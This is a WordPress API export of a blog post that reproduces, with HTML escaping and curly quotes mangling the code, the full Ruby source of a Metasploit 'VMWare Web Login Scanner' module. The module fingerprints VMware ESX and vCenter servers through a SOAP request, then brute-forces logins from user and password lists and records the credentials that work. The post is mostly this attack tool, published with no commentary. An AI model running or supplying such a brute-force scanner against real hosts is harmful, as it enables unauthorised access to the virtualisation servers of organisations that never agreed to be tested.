##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::VIMSoap
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner<\/p>\n
def initialize
super(
‘Name’ => ‘VMWare Web Login Scanner’,
‘Description’ => ‘This module attempts to authenticate to the VMWare HTTP service
for VmWare Server, ESX, and ESXI’,
‘Author’ => [‘theLightCosine’],
‘References’ =>
[
[ ‘CVE’, ‘1999-0502’] # Weak password
],
‘License’ => MSF_LICENSE,
‘DefaultOptions’ => { ‘SSL’ => true }
)<\/p>\n
register_options(
[
OptString.new(‘URI’, [true, “The default URI to login with”, “\/sdk”]),
Opt::RPORT(443)
])
end<\/p>\n
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: ‘vmware’,
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)<\/p>\n
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]}.merge(service_data)<\/p>\n
create_credential_login(login_data)
end<\/p>\n
def run_host(ip)
return unless is_vmware?
each_user_pass { |user, pass|
result = vim_do_login(user, pass)
case result
when :success
print_good “#{rhost}:#{rport} – Successful Login! (#{user}:#{pass})”
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)
return if datastore[‘STOP_ON_SUCCESS’]when :fail
print_error “#{rhost}:#{rport} – Login Failure (#{user}:#{pass})”
end
}
end<\/p>\n
# Mostly taken from the Apache Tomcat service validator
def is_vmware?
soap_data =
%Q|<env:Envelope xmlns:xsd=”http:\/\/www.w3.org\/2001\/XMLSchema” xmlns:env=”http:\/\/schemas.xmlsoap.org\/soap\/envelope\/” xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance”>
<env:Body>
<RetrieveServiceContent xmlns=”urn:vim25″>
<_this type=”ServiceInstance”>ServiceInstance<\/_this>
<\/RetrieveServiceContent>
<\/env:Body>
<\/env:Envelope>|<\/p>\n
res = send_request_cgi({
‘uri’ => normalize_uri(datastore[‘URI’]),
‘method’ => ‘POST’,
‘agent’ => ‘VMware VI Client’,
‘data’ => soap_data
}, 25)<\/p>\n
unless res
vprint_error(“#{rhost}:#{rport} Error: no response”)
return false
end<\/p>\n
fingerprint_vmware(res)
rescue ::Rex::ConnectionError => e
vprint_error(“#{rhost}:#{rport} Error: could not connect”)
return false
rescue => e
vprint_error(“#{rhost}:#{rport} Error: #{e}”)
return false
end<\/p>\n
def fingerprint_vmware(res)
unless res
vprint_error(“#{rhost}:#{rport} Error: no response”)
return false
end
return false unless res.body.include?(‘<vendor>VMware, Inc.<\/vendor>’)<\/p>\n
os_match = res.body.match(\/<name>([\\w\\s]+)<\\\/name>\/)
ver_match = res.body.match(\/<version>([\\w\\s\\.]+)<\\\/version>\/)
build_match = res.body.match(\/<build>([\\w\\s\\.\\-]+)<\\\/build>\/)
full_match = res.body.match(\/<fullName>([\\w\\s\\.\\-]+)<\\\/fullName>\/)<\/p>\n
if full_match
print_good “#{rhost}:#{rport} – Identified #{full_match[1]}”
report_service(:host => rhost, :port => rport, :proto => ‘tcp’, :sname => ‘https’, :info => full_match[1])
end<\/p>\n
unless os_match and ver_match and build_match
vprint_error(“#{rhost}:#{rport} Error: Could not identify host as VMWare”)
return false
end<\/p>\n
if os_match[1].include?(‘ESX’) || os_match[1].include?(‘vCenter’)
# Report a fingerprint match for OS identification
report_note(
:host => rhost,
:ntype => ‘fingerprint.match’,
:data => {‘os.vendor’ => ‘VMware’, ‘os.product’ => os_match[1] + ” ” + ver_match[1], ‘os.version’ => build_match[1] }
)
return true
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::VIMSoapinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::AuthBruteinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘VMWare Web Login Scanner’,‘Description’ => ‘This module attempts to authenticate to the VMWare HTTP servicefor VmWare Server, ESX, and ESXI’,‘Author’ => [‘theLightCosine’],‘References’ =>[[ ‘CVE’, ‘1999-0502’] # Weak password],‘License’ => MSF_LICENSE,‘DefaultOptions’ => { ‘SSL’ => …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59318","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59318"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59318\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}